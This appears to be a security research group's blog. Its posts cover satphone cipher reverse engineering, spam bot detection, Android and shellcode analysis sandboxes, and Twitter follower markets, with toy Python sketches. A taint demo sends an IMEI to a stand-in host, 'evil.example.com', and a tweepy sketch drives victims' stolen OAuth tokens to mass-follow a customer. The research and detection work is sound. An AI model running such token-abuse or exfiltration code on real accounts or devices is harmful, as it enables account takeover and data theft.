A Security Analysis of Two Satphone Standards

There is a rich body of work on the security aspects of cellular mobile phones, in particular the GSM and UMTS systems. Similarly to GSM, there exist two standards for satellite telephony, called GMR-1 and GMR-2. These two standards govern the way satellite phones (satphones for short) and a satellite communicate with each other; for example, they dictate which frequencies and protocols are to be used between both parties. Even though satellite telephony is a niche market compared to the 2G and 3G mobile systems, there are several hundred thousand satphone subscribers worldwide. Given the sensitive nature of some of their application domains (e.g., natural disaster areas or military campaigns), security plays a particularly important role for satphones. One of the most important aspects is the encryption algorithm that is used to prevent eavesdropping by third parties. This is especially important for satellite telephony, since the transmitted data is broadcast over a large region: the data sent from a satellite to a phone, for example, can be received in an area several hundred kilometers in diameter.

Interestingly, the encryption algorithms are not part of the public documentation of either standard; they are intentionally kept secret. We therefore analyzed both encryption systems and were able to completely reverse engineer the algorithms they employ. The procedure we used can be outlined as follows:

  1. Retrieve a dump of the firmware (from the firmware updater or the device itself).
  2. Analyze the firmware in a disassembler.
  3. Retrieve the DSP (digital signal processor) code inside the firmware. The DSP is a special co-processor that is used to efficiently implement tasks such as signaling and encoding, but (more importantly) also encryption.
  4. Find the encryption algorithms inside the DSP code.
  5. Translate the cipher code into a higher-level language representation and perform a cryptanalysis.

We could use existing tools for some of these tasks (such as the disassembler IDA Pro), but it was also necessary to develop a custom disassembler and analysis tools, and we extended prior work on binary analysis to efficiently identify cryptographic code. In both cases, the encryption was implemented in the DSP code. Perhaps somewhat surprisingly, we found that the GMR-1 cipher can be considered a proprietary variant of the GSM A5/2 algorithm, whereas the GMR-2 cipher is an entirely new design.
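
A common heuristic in this line of binary analysis work is that cryptographic routines contain an unusually high density of bitwise and arithmetic instructions. The following is a minimal sketch of that idea in Python; the mnemonic set, the threshold, and the input format are illustrative assumptions, not our actual toolchain.

```python
# Toy heuristic: flag functions whose instruction mix looks "crypto-like".
# Input: {function_name: [mnemonic, ...]} as produced by some disassembler
# front end (hypothetical format, for illustration only).

CRYPTO_OPS = {"xor", "and", "or", "shl", "shr", "rol", "ror", "not"}

def crypto_candidates(functions, threshold=0.25):
    """Return functions whose share of bitwise ops exceeds the threshold."""
    candidates = []
    for name, mnemonics in functions.items():
        if not mnemonics:
            continue
        ratio = sum(m in CRYPTO_OPS for m in mnemonics) / len(mnemonics)
        if ratio >= threshold:
            candidates.append((name, ratio))
    return sorted(candidates, key=lambda c: -c[1])

# A tight keystream loop stands out against ordinary control code:
funcs = {
    "keystream_gen": ["xor", "shr", "xor", "and", "rol", "xor", "mov"],
    "ui_update":     ["mov", "cmp", "jne", "call", "mov", "ret"],
}
print(crypto_candidates(funcs))  # [('keystream_gen', ...)]
```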

After analyzing both proprietary stream ciphers, we were able to adapt known ciphertext-only attacks against A5/2 to the GMR-1 algorithm, with an average-case complexity of 2^32 steps. With respect to the GMR-2 cipher, we developed a new attack that is powerful in a known-plaintext setting: the encryption key for one session (i.e., one phone call) can be recovered with approximately 50–65 bytes of keystream and a moderate computational complexity. A major finding of our work is that the stream ciphers of the two existing satellite phone systems are considerably weaker than the state of the art in symmetric cryptography.
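
To illustrate the kind of construction involved: A5/2 and its relatives build their keystream from a handful of short linear feedback shift registers (LFSRs), and this linearity is exactly what the known attacks exploit. Below is a generic single-LFSR keystream sketch in Python; the register length and taps are textbook demo values, not the actual GMR-1 parameters.

```python
def lfsr_keystream(state, taps, length, nbits=19):
    """Generic Fibonacci LFSR: one output bit per clock.

    state: initial register contents (int, nbits wide, non-zero)
    taps:  bit positions XORed into the feedback
    Demo parameters only -- NOT the real GMR-1 registers.
    """
    out = []
    for _ in range(length):
        out.append(state & 1)                       # output the LSB
        fb = 0
        for t in taps:
            fb ^= (state >> t) & 1                  # linear feedback
        state = (state >> 1) | (fb << (nbits - 1))  # shift feedback bit in
    return out

# 20 keystream bits from a toy 19-bit register:
print(lfsr_keystream(state=0b1011011001110001101, taps=(18, 17, 16, 13),
                     length=20))
```

Because each output bit is a linear function of the initial register state, once the nonlinear parts of a cipher are guessed or cancelled, the attacker is left with a system of linear equations; this is the essence of the A5/2-style attacks we adapted.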

We published this work at the 33rd IEEE Symposium on Security and Privacy, where the paper won the Best Paper Award. You can find more information regarding this topic at http://gmr.crypto.rub.de

Posted in Web Security

SMTP Dialects, or how to detect bots by looking at SMTP conversations

It is somewhat surprising that, in 2012, we are still struggling to fight spam. In fact, any victory we score against botnets is only temporary, and spam levels rise again after some time. As an example, the amount of spam received worldwide dropped dramatically when Microsoft shut down the Rustock botnet, but it has been rising again since then.

For these reasons, we need new techniques to detect and block spam. Current techniques mostly fall into two categories: content analysis and origin analysis. Content analysis techniques look at what is being sent: they typically analyze the content of an email to see whether it is indicative of spam (for example, whether it contains words that are frequently linked to spam). Origin analysis techniques, on the other hand, look at who is sending an email, and flag the email as spam if the sender (for example, the IP address the email is coming from) is known to be malicious. Both approaches fall short in practice. Content analysis is usually very resource intensive and cannot be run on every email sent to large, busy mail servers; it can also be evaded by carefully crafting the spam email. Origin analysis techniques, in turn, often have coverage problems, and fail to flag many sources that are actually sending out spam.

In our paper B@BEL: Leveraging Email Delivery for Spam Mitigation, which was presented at the USENIX Security Symposium last August, we propose to look at how emails are sent instead. The idea behind our approach is simple: the SMTP protocol, which is used to send emails on the Internet, follows Postel's Law, which states: “Be liberal in what you accept, but conservative in what you send”. As a consequence, email software developers can come up with their own interpretation of the SMTP protocol and still successfully send emails. We call these variations of the protocol SMTP dialects. In the paper we show how it is possible to figure out which software (legitimate or malicious) sent a certain email just by looking at the SMTP messages exchanged between the client and the server. We also show how it is possible to enumerate the dialects spoken by spamming bots, and to leverage them for spam mitigation.
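
As a toy illustration of what a dialect looks like at the protocol level: clients differ in details such as HELO vs. EHLO, command capitalization, and line endings. The sketch below extracts a crude fingerprint from the client side of a recorded SMTP conversation; this feature set is a simplified stand-in for the state machines used in the paper.

```python
# Toy SMTP "dialect" fingerprint: which commands a client sends, in what
# order, and with which formatting quirks. Simplified for illustration.

def dialect_fingerprint(client_lines):
    features = []
    for line in client_lines:
        verb = line.split(None, 1)[0] if line.strip() else ""
        features.append((verb.upper(),            # which command
                         verb.isupper(),          # capitalization quirk
                         line.endswith("\r\n")))  # line-ending quirk
    return tuple(features)

legit = ["EHLO mail.example.com\r\n", "MAIL FROM:<a@example.com>\r\n",
         "RCPT TO:<b@example.org>\r\n", "DATA\r\n"]
bot   = ["helo localhost\n", "mail from: <a@example.com>\n",
         "rcpt to: <b@example.org>\n", "data\n"]

print(dialect_fingerprint(legit) == dialect_fingerprint(bot))  # False
```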

Although not perfect, this technique, used in conjunction with existing ones, allows us to catch more spam, and it is a useful advancement in the war against spamming botnets.

Posted in Malware Analysis and Detection

Andrubis: A Tool for Analyzing Unknown Android Applications

We are proud to announce that we have released our brand new extension for Anubis: Andrubis. As the name suggests, Andrubis is designed to analyze unknown apps for the Android platform (APKs), just like Anubis does for Windows executables. The main goal we had in mind when designing Andrubis is the analysis of mobile malware, motivated by the rise of malware on mobile devices, especially smartphones and tablets. The report provided by Andrubis gives the human analyst insight into various behavioral aspects and properties of a submitted app. To achieve comprehensive results, Andrubis employs both static and dynamic analysis approaches.

During the dynamic analysis, an app is installed and run in an emulator. Thorough instrumentation of the Dalvik VM provides the basis for observing the app's behavior. For file operations we track both read and write events and report on the files and content affected. For network operations we also cover the typical events (open, read, write), the associated endpoint and the data involved. Additionally, all traffic transmitted during the sandbox operation is captured and provided as a pcap file. Of course, we employ the containment strategies for malicious traffic that have proven their effectiveness with Anubis. Dynamic analysis allows us to detect dynamically registered broadcast receivers, which do not have to be declared before actual execution, as well as services that are actually started. We also capture cellphone-specific events, such as phone calls and short messages sent. Taint analysis is used to report on leakage of sensitive data such as the IMEI, and it also shows the sink through which the information is leaked, including files, network connections and short messages. Invocations of Android's crypto facilities are logged, too. Finally, we report on dynamically loaded code, both on the Dalvik VM level (DEX files) and on the binary level; the latter includes native libraries loaded through JNI.
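
For readers unfamiliar with taint analysis, the core idea is small: mark data coming from sensitive sources (e.g., the IMEI) and raise a report whenever marked data reaches a sink (file, socket, SMS). The Python sketch below is a conceptual toy, not Andrubis' actual Dalvik VM instrumentation; all names in it are made up for illustration.

```python
# Conceptual taint tracking: sources mark data, sinks check the mark.
# A toy mimicking what in-VM instrumentation does; names are illustrative.

class Tainted(str):
    """A string that remembers where it came from."""
    def __new__(cls, value, source):
        obj = super().__new__(cls, value)
        obj.source = source
        return obj

def get_device_id():
    # Source: returns tainted data, as an instrumented API would.
    return Tainted("356938035643809", source="IMEI")

def send_over_network(data, endpoint):
    # Sink: an instrumented socket write checks for taint before sending.
    if isinstance(data, Tainted):
        print(f"LEAK: {data.source} -> network sink {endpoint}")
    # ... actual send elided ...

imei = get_device_id()
send_over_network("hello", "evil.example.com:80")  # no report
send_over_network(imei, "evil.example.com:80")     # LEAK: IMEI -> ...
```

A real implementation must also propagate taint through string and array operations, which this toy deliberately ignores.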

Additionally, we collect information that can be obtained statically, i.e., without actually executing the app. To begin with, we list the main components an app uses to communicate with the Android OS: activities, services, broadcast receivers and content providers. Going into more detail, information related to the intent filters declared by these components is also included. We recommend reading the Android framework documentation for a detailed explanation of what these components are and which role they play. Runtime requirements are a further aspect: the report displays both the external libraries that are necessary to run the app and the specific hardware features the app requires. Furthermore, we compare the permissions the user has to grant at installation time with those actually used by the application, and provide a detailed list of the method calls that require a certain permission. Finally, we also output all URLs that we were able to find in the app's bytecode.
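
Much of this static information can be pulled out of an APK with open-source tooling. The sketch below uses the androguard library (the API as of androguard 3.x, which may differ from what Andrubis uses internally) to list components, permissions, and strings that look like URLs; "sample.apk" is a placeholder.

```python
# Static extraction from an APK with androguard (3.x-era API; shown as an
# illustration, not as Andrubis' internal implementation).
import re
from androguard.misc import AnalyzeAPK

apk, dex_files, analysis = AnalyzeAPK("sample.apk")  # placeholder path

print("Permissions:", apk.get_permissions())
print("Activities: ", apk.get_activities())
print("Services:   ", apk.get_services())
print("Receivers:  ", apk.get_receivers())
print("Providers:  ", apk.get_providers())

# Crude URL scan over the string constants in the app's bytecode.
url_re = re.compile(r"https?://[^\s\"']+")
urls = {m.group(0) for d in dex_files for s in d.get_strings()
        for m in [url_re.search(str(s))] if m}
print("URLs:", sorted(urls))
```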

In order not to reinvent the wheel, we leveraged several existing open source projects in addition to the Android SDK.

Check out the new Andrubis at anubis.iseclab.org and submit your APKs! If you have any questions, bug reports or comments, contact us at andrubis@iseclab.org.

Posted in Anubis, Binary Analysis, Malware Analysis and Detection

Poultry Markets: On the Underground Economy of Twitter Followers

Twitter has become such an important medium that companies and celebrities use it extensively to reach their customers and their fans. Nowadays, creating a large and engaged network of followers can make the difference between success and failure in marketing. However, building such a network takes time, especially when the party building it does not yet have an established reputation with the public.

For this reason, a number of websites have emerged to help Twitter users create a large network of followers. These websites promise to provide their subscribers with followers in exchange for a fee. In addition, some of these services offer to spread promotional messages in the network. We call this phenomenon Twitter Account Markets. We study it in our paper “Poultry Markets: On the Underground Economy of Twitter Followers”, which will appear at the SIGCOMM Workshop on Online Social Networks (WOSN) later this year.

Typically, the services offered by a Twitter Account Market are accessible through a webpage. Customers can buy followers at rates between $20 and $100 per 1,000 followers. In addition, markets typically offer the possibility of having content sent out by a certain number of accounts, again in exchange for a fee.

All Twitter Account Markets we analyzed offer both “free” and “premium” versions of their services. While premium accounts pay for their services, the free ones gain followers by giving away their Twitter credentials (a clever way of phishing). Once the market administrator gets the credentials for an account, he can make it follow other Twitter accounts (free or premium customers of the market), or send out “promoted” content (typically spam). For convenience, the market administrator typically authorizes an OAuth application using his victim's stolen credentials. By doing this, he can easily administer a large number of accounts through the Twitter API.
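
To make the mechanics concrete: once an OAuth application has been authorized from a victim's account, the operator holds a per-account access token and can drive all victims from a single script. The sketch below illustrates the pattern with the tweepy library; all credentials and names are placeholders, and this is our reconstruction of the mechanism, not the markets' actual tooling.

```python
# How one OAuth app can drive many compromised accounts via the Twitter API.
# Sketch with tweepy; every credential below is a placeholder.
import tweepy

CONSUMER_KEY, CONSUMER_SECRET = "app-key", "app-secret"  # the market's app

# One (access_token, access_secret) pair per victim who "authorized" the app.
victim_tokens = [
    ("token-1", "secret-1"),
    ("token-2", "secret-2"),
]

def follow_from_all(victims, target_screen_name):
    for token, secret in victims:
        auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
        auth.set_access_token(token, secret)
        api = tweepy.API(auth)
        # Each victim account follows the paying customer.
        api.create_friendship(screen_name=target_screen_name)

follow_from_all(victim_tokens, "paying_customer")
```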

Twitter Account Markets are a big problem on Twitter: first, an account with an inflated number of followers looks more trustworthy to other social network users. Second, these services introduce spam into the network.

Of course, Twitter does not like this behavior. In fact, they introduced a clause in their Terms of Service that specifically forbids participating in Twitter Account Market operations, and Twitter periodically suspends the OAuth applications used by these markets. However, since the market administrator has the credentials to his victims' accounts, he can simply authorize a new application and continue his operation.

In our paper, we propose techniques to detect both Twitter Account Market victims and customers. We believe that an effective way of mitigating this problem would be to focus on the customers rather than on the victims: since participating in a Twitter Account Market violates the Terms of Service, Twitter could suspend such accounts and hit the market on the economic side.

Posted in Social Networks

Shellzer: a tool for the dynamic analysis of malicious shellcode

Last September, I presented Shellzer at the RAID 2011 conference. Shellzer is a tool I developed back in August 2010 to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples collected by running Wepawet over the years. Due to the size of our dataset (about 30,000 shellcode samples at the time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a Python Win32 debugging abstraction class. Using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted in single-stepping through the whole shellcode binary. This gave me complete control over the sample's execution, which is ideal when dealing with a malicious piece of code. Unfortunately, this approach is not feasible in practice: the number of assembly instructions executed at run time is in the order of millions, even though shellcode is commonly only a few hundred bytes long. This is because shellcode contains many loops, some of which execute thousands of times, and because it invokes Windows API functions. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis consequently took several minutes on average.
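
For reference, this is roughly what the naive single-stepping approach looks like with PyDbg. It is a minimal sketch, assuming the shellcode has been wrapped in a host executable (the "host.exe" name is hypothetical); the callback fires on every single instruction, which is exactly where the overhead comes from.

```python
# Naive single-stepping with PyDbg: one callback per executed instruction.
# Minimal sketch; "host.exe" is a hypothetical wrapper around the sample.
from pydbg import pydbg
from pydbg.defines import EXCEPTION_SINGLE_STEP, DBG_CONTINUE

instruction_count = 0

def on_single_step(dbg):
    global instruction_count
    instruction_count += 1    # millions of hits for a tiny shellcode
    dbg.single_step(True)     # re-arm the trap flag for the next instruction
    return DBG_CONTINUE

dbg = pydbg()
dbg.load("host.exe")
dbg.set_callback(EXCEPTION_SINGLE_STEP, on_single_step)
dbg.single_step(True)
dbg.run()
print("executed instructions:", instruction_count)
```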

My research then focused on how to avoid single-stepping through the whole shellcode's execution while maintaining complete control over it. This proved to be challenging, due to the many evasion techniques used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists of a detailed trace of the Windows API functions called (with their parameters and return values), the Windows DLLs that were loaded, and the list of URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, in addition to those detected in web-based drive-by-download attacks.
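
The key ingredient for such an API trace is much cheaper than single-stepping: place breakpoints only on the API entry points of interest and log each hit. Below is a hedged PyDbg sketch of that pattern; the hooked function list and log format are illustrative, not Shellzer's actual hook set.

```python
# Tracing API calls with breakpoints instead of single-stepping.
# Sketch only; the hooked functions below are an illustrative subset.
from pydbg import pydbg
from pydbg.defines import DBG_CONTINUE

HOOKS = [("kernel32.dll", "LoadLibraryA"),
         ("kernel32.dll", "CreateFileA"),
         ("wininet.dll",  "InternetOpenUrlA")]

def on_api_hit(dbg):
    # Log which hooked API was reached; a real tool would also decode
    # the call's arguments from the stack here.
    print("API call at 0x%08x" % dbg.context.Eip)
    return DBG_CONTINUE

dbg = pydbg()
dbg.load("host.exe")                          # hypothetical wrapper, as before
for dll, func in HOOKS:
    addr = dbg.func_resolve(dll, func)        # resolve the export's address
    if addr:
        dbg.bp_set(addr, handler=on_api_hit)  # breakpoint fires on each call
dbg.run()
```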

Starting in November 2011, the tool has been used by Wepawet: when a shellcode is detected, it is automatically forwarded to the shellcode analyzer, and Shellzer's report is included in the main Wepawet report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If, after submitting a sample to Wepawet, a shellcode is detected but you don't see the additional shellcode information, it means that something went wrong. Please don't hesitate to contact us in case of errors: we need your feedback!

Posted in Binary Analysis, Web Security

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Last month I was invited to SecurityZone in Cali, the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known international security experts for 2+1 days of conference in a DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson animated the event with talks on cyberwar attacks, compliance, red team testing and threat modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia, as well as from the UK, USA, Venezuela, Brazil, Argentina and Mexico, and over 2,400 people were connected via streaming.

But SecurityZone's success is not only a matter of numbers: among the many conferences I have attended lately, SecurityZone has certainly been one of the best in terms of its people. The organizers did an excellent job in putting together this event. I won't forget their cordiality, kindness, and friendly, always smiling attitude. At the same time, the attendees were hungry for knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012; in the meantime, follow us on Twitter!

Posted in Conferences

About the Nexat paper at ACSAC 2011

Last week, our group attended ACSAC 2011. The conference was held at the Buena Vista Palace in Orlando, Florida. I presented the Nexat paper, and the feedback was encouraging.

Nexat was a research project in collaboration with Casey Cipriano and Amir Houmansadr. Nexat tries to solve a problem that a typical security administrator faces nowadays: administrators are normally overwhelmed by the number of security alerts their monitoring tools generate, and they cannot keep up with the stream of events, let alone predict the next security-related events. As a result, administrators are usually reactive.

The reason for this problem is that the security battlefield is not even: a single button pressed by an attacker may cause thousands of alerts on the administrator's side. Nexat tries to even the field by deducing relationships between different sets of alerts. It is able to detect related alerts (alerts that may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets administrators be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attacks as long as they are composed of detectable steps. For our evaluation, we used the alerts generated by Snort during the iCTF 2008 competition.
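
As a toy illustration of the general idea (not Nexat's actual model): if alerts are grouped into per-attacker sessions, even simple sequence statistics learned from history can suggest the most likely next alert. The sketch below learns bigram counts over alert types; the alert names are invented.

```python
# Toy next-alert prediction from historical alert sequences (bigram counts).
# Illustrates the general idea only; alert names are invented.
from collections import Counter, defaultdict

def train(sessions):
    """sessions: list of alert-type sequences, one per attacker session."""
    model = defaultdict(Counter)
    for seq in sessions:
        for cur, nxt in zip(seq, seq[1:]):
            model[cur][nxt] += 1
    return model

def predict_next(model, last_alert):
    following = model.get(last_alert)
    return following.most_common(1)[0][0] if following else None

history = [
    ["portscan", "ssh_bruteforce", "ssh_login", "priv_escalation"],
    ["portscan", "ssh_bruteforce", "ssh_login", "data_exfil"],
    ["portscan", "web_sqli", "web_shell_upload"],
]
model = train(history)
print(predict_next(model, "ssh_bruteforce"))  # -> 'ssh_login'
```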

Posted in Systems Security